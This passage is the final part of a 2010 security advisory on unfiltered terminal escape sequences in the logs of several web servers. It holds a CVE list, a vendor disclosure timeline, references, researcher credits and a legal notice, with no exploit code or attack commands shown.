affected at all like in this case. Security in complex systems requires some synergy. 2) Varnish is the only program that doesn't need a "cat" program as logs are stored in memory and displayed using the "varnishlog" utility. 2) Apache fixed a similiar bug (CVE-2003-0020), "Low: Error log escape filtering", in 2004 (six years ago). The bug was affecting Apache up to 1.3.29 \[8\] or 2.0.48 \[9\] depending on the branch. Take you conclusion, criticize if you want. In the meantime things are a little safer. VII. CVE INFORMATION CVE-2009-4487 nginx 0.7.64 CVE-2009-4488 Varnish 2.0.6 CVE-2009-4489 Cherokee 0.99.30 CVE-2009-4490 mini\_httpd 1.19 CVE-2009-4491 thttpd 2.25b0 CVE-2009-4492 WEBrick 1.3.1 CVE-2009-4493 Orion 2.0.7 CVE-2009-4494 AOLserver 4.5.1 CVE-2009-4495 Yaws 1.85 CVE-2009-4496 Boa 0.94.14rc21 VIII. DISCLOSURE TIMELINE 20091117 Bug discovered 20091208 First vendor contact 20091209 Cherokee team confirms vulnerability (Alvaro Lopez Ortega) 20091209 Alvaro Lopez Ortega commits Cherokee patch 20091210 Ruby team confirms vulnerability (Shugo Maeda) 20091211 Shugo Maeda sends us webrick patch for evaulation 20091211 AOLserver confirms vulnerability (Jim Davidson) 20091221 Contacted Raphael Geissert (Debian Security) 20091223 Contacted Steven M. Christey (mitre.org) 20091230 Raphael Geissert forwards to Redhat, Debian, Ubuntu and Mitre 20091230 CVEs assigned by Steven M. Christey 20100105 Poul-Henning (Varnish) Kamp said WONT-FIX 20100105 Ruby team is ready for commit (Urabe Shyouhei) 20100106 Second vendor contact 20100110 Advisory release IX. REFERENCES \[1\] Jetty 6.x and 7.x Multiple Vulnerabilities http://www.ush.it/team/ush/hack-jetty6x7x/jetty-adv.txt \[2\] Apache does not filter terminal escape sequences from error logs http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020 \[3\] Apache does not filter terminal escape sequences from access logs http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083 \[4\] Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability http://www.milw0rm.com/exploits/7681 \[5\] Terminal Emulator Security Issues http://marc.info/?l=bugtraq&m=104612710031920&w=2 \[6\] Eterm Screen Dump Escape Sequence Local File Corruption Vulnerability http://www.securityfocus.com/bid/6936/discuss \[7\] RXVT Screen Dump Escape Sequence Local File Corruption Vulnerability http://www.securityfocus.com/bid/6938/discuss \[8\] Apache httpd 1.3 vulnerabilities http://httpd.apache.org/security/vulnerabilities\_13.html \[9\] Apache httpd 2.2 vulnerabilities http://httpd.apache.org/security/vulnerabilities\_22.html X. CREDIT Giovanni "evilaliv3" Pellerano, Alessandro "jekil" Tanasi and Francesco "ascii" Ongaro are credited with the discovery of this vulnerability. Giovanni "evilaliv3" Pellerano web site: http://www.ush.it/, http://www.evilaliv3.org/ mail: evilaliv3 AT ush DOT it Alessandro "jekil" Tanasi web site: http://www.tanasi.it/ mail: alessandro AT tanasi DOT it Francesco "ascii" Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it X. LEGAL NOTICES Copyright (c) 2009 Francesco "ascii" Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Tag

#nginx